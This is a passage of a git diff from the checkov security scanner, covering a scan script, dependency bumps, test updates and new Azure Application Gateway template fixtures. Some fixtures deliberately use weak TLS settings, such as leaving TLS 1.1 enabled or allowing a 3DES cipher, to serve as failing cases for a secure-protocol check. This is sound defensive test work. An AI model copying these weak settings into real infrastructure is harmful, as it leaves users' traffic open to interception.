$INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG) else - echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG" - CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $SKIP_PATH_FLAG) + echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG" + CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG) fi fi diff --git a/kubernetes/requirements.txt b/kubernetes/requirements.txt index b4829887dac..f5af9c2b01b 100644 --- a/kubernetes/requirements.txt +++ b/kubernetes/requirements.txt @@ -1 +1 @@ -checkov==3.2.79 +checkov==3.2.125 diff --git a/performance_tests/test_checkov_performance.py b/performance_tests/test_checkov_performance.py index fd2aef36210..12d7b4cfbe7 100644 --- a/performance_tests/test_checkov_performance.py +++ b/performance_tests/test_checkov_performance.py @@ -18,7 +18,7 @@ 'repo_name': 'terraform-aws-components', 'threshold': { "Darwin": 19.0, - "Linux": 8.0, + "Linux": 10.0, "Windows": 15.0, } }, diff --git a/setup.py b/setup.py index 4a4f58e2c52..a37c67f4d71 100644 --- a/setup.py +++ b/setup.py @@ -66,7 +66,7 @@ def run(self) -> None: }, install_requires=[ "bc-python-hcl2==0.4.2", - "bc-detect-secrets==1.5.9", + "bc-detect-secrets==1.5.11", "bc-jsonpath-ng==1.6.1", "pycep-parser==0.4.1", "tabulate>=0.9.0,<0.10.0", @@ -108,7 +108,8 @@ def run(self) -> None: "license-expression>=30.1.0,<31.0.0", "rustworkx>=0.13.0,<0.14.0", "pydantic>=2.0.0,<3.0.0", - "botocore==1.34.25" + "botocore==1.34.25", + "urllib3>=1.26.0,<2.0.0" ], dependency_links=[], # keep it empty, needed for pipenv-setup license="Apache License 2.0", @@ -142,6 +143,7 @@ def run(self) -> None: "checkov.terraform.checks.graph_checks": ["**/*.json"], "checkov.cdk.checks": [ "python/*.yaml", + "typescript/*.yaml", ], }, scripts=["bin/checkov", "bin/checkov.cmd"], diff --git a/tests/ansible/test_graph_manager.py b/tests/ansible/test_graph_manager.py index 037a3193570..6d3909e9d29 100644 --- a/tests/ansible/test_graph_manager.py +++ b/tests/ansible/test_graph_manager.py @@ -34,15 +34,17 @@ def test_build_graph_from_definitions(): assert task.attributes[CustomAttributes.RESOURCE_TYPE] == "tasks.amazon.aws.ec2_instance" assert task.attributes[START_LINE] == 11 assert task.attributes[END_LINE] == 22 - assert task.config == { - "name": "public-compute-instance", - "key_name": "prod-ssh-key", - "vpc_subnet_id": "subnet-5ca1ab1e", - "instance_type": "c5.large", - "security_group": "default", - "network": {"assign_public_ip": True, "__startline__": 19, "__endline__": 20}, - "image_id": "ami-123456", - "ebs_optimized": True, - "__startline__": 13, - "__endline__": 22, - } + assert task.config == {'name': 'enabled', + 'amazon.aws.ec2_instance': + {'name': 'public-compute-instance', + 'key_name': 'prod-ssh-key', + 'vpc_subnet_id': 'subnet-5ca1ab1e', + 'instance_type': 'c5.large', + 'security_group': 'default', + 'network': {'assign_public_ip': True, '__startline__': 19, '__endline__': 20}, + 'image_id': 'ami-123456', + 'ebs_optimized': True, + '__startline__': 13, + '__endline__': 22}, + '__startline__': 11, + '__endline__': 22} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json new file mode 100644 index 00000000000..9bdb234f4fd --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json @@ -0,0 +1,226 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "empty_sslPolicy_fail1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "disabledSslProtocols": "TLSv1_0" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json new file mode 100644 index 00000000000..f30451083f4 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json @@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_fail3", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "20150501" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json new file mode 100644 index 00000000000..e7ac9fa7562 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json @@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_pass1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "AppGwSslPolicy20220101S" + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json new file mode 100644 index 00000000000..f735d773f77 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json @@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2018-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_fail2", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + "TLS_AES_128_GCM_SHA256","TLS_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", + "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256", + "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA" + ] + } + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json new file mode 100644 index 00000000000..1e51ad85903 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json @@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": 